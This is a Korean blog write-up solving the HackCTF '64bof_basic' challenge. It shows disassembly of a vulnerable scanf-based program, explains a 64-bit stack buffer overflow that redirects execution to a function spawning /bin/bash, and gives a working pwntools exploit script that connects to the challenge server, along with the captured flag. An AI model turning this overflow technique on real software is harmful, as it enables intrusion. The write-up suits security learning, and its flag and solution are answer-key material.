callMeMaybe라는 함수를 호출하면 shell이 따지는 구조인 듯 하다.
Dump of assembler code for function callMeMaybe:
0x0000000000400606 <+0>: push rbp
0x0000000000400607 <+1>: mov rbp,rsp
0x000000000040060a <+4>: sub rsp,0x20
0x000000000040060e <+8>: mov QWORD PTR [rbp-0x20],0x400734
0x0000000000400616 <+16>: mov QWORD PTR [rbp-0x18],0x40073e
0x000000000040061e <+24>: mov QWORD PTR [rbp-0x10],0x0
0x0000000000400626 <+32>: mov rax,QWORD PTR [rbp-0x20]
0x000000000040062a <+36>: lea rcx,[rbp-0x20]
0x000000000040062e <+40>: mov edx,0x0
0x0000000000400633 <+45>: mov rsi,rcx
0x0000000000400636 <+48>: mov rdi,rax
0x0000000000400639 <+51>: call 0x4004f8 <execve@plt>
0x000000000040063e <+56>: nop
0x000000000040063f <+57>: leave
0x0000000000400640 <+58>: ret
End of assembler dump.callMeMaybe함수.
execve함수를 통해 bin/bash를 호출한다.
Dump of assembler code for function main:
0x0000000000400641 <+0>: push rbp
0x0000000000400642 <+1>: mov rbp,rsp
0x0000000000400645 <+4>: sub rsp,0x120
0x000000000040064c <+11>: mov DWORD PTR [rbp-0x114],edi
0x0000000000400652 <+17>: mov QWORD PTR [rbp-0x120],rsi
0x0000000000400659 <+24>: lea rax,[rbp-0x110]
0x0000000000400660 <+31>: mov rsi,rax
0x0000000000400663 <+34>: mov edi,0x400741
0x0000000000400668 <+39>: mov eax,0x0
0x000000000040066d <+44>: call 0x400508 <__isoc99_scanf@plt>
0x0000000000400672 <+49>: lea rax,[rbp-0x110]
0x0000000000400679 <+56>: mov rdi,rax
0x000000000040067c <+59>: call 0x4004e0 <strlen@plt>
0x0000000000400681 <+64>: mov DWORD PTR [rbp-0x4],eax
0x0000000000400684 <+67>: lea rax,[rbp-0x110]
0x000000000040068b <+74>: mov rsi,rax
0x000000000040068e <+77>: mov edi,0x400744
0x0000000000400693 <+82>: mov eax,0x0
0x0000000000400698 <+87>: call 0x4004e8 <printf@plt>
0x000000000040069d <+92>: mov eax,0x0
0x00000000004006a2 <+97>: leave
0x00000000004006a3 <+98>: ret
End of assembler dump. 0x0000000000400663 <+34>: mov edi,0x400741
0x0000000000400668 <+39>: mov eax,0x0
0x000000000040066d <+44>: call 0x400508 <__isoc99_scanf@plt>
0x0000000000400672 <+49>: lea rax,[rbp-0x110]scanf함수를 통해 문자열을 받아온다. 이 문자열은 0x110만큼의 메모리를 차지한다.
0x000000000040067c <+59>: call 0x4004e0 <strlen@plt>
0x0000000000400681 <+64>: mov DWORD PTR [rbp-0x4],eax4byte의 공간에 입력받은 문자열의 길이를 저장한다.
0x000000000040068e <+77>: mov edi,0x400744
0x0000000000400693 <+82>: mov eax,0x0
0x0000000000400698 <+87>: call 0x4004e8 <printf@plt>Hello {입력받은 문자열}을 출력한다.
STACK과 SFP를 넘어 RET에 callMeMaybe 함수의 주소가 저장되게 하면 된다.
from pwn import *
#p = process("./64bof_basic")
p = remote("ctf.j0n9hyun.xyz",3004)
addr = 0x0000000000400606
s = "\x90"*(0x110+8) + p64(addr)
p.sendline(s)
p.interactive()0x110(문자열 바이트 수 ) + 4(strlen의 값이 저장되어있는 변수) + 4(SFP)
FLAG : HackCTF{64b17_b0f_15_51mpl3_700}
반응형
'WriteUp > HackCTF' 카테고리의 다른 글
| [HackCTF] gift (0) | 2021.08.08 |
|---|---|
| [HackCTF] RTL_World (0) | 2021.08.08 |
| [HackCTF] ROP (0) | 2021.08.08 |
| [HackCTF] Basic_BOF #2 (0) | 2021.08.08 |
| [HackCTF] Basic_BOF #1 (0) | 2021.08.08 |
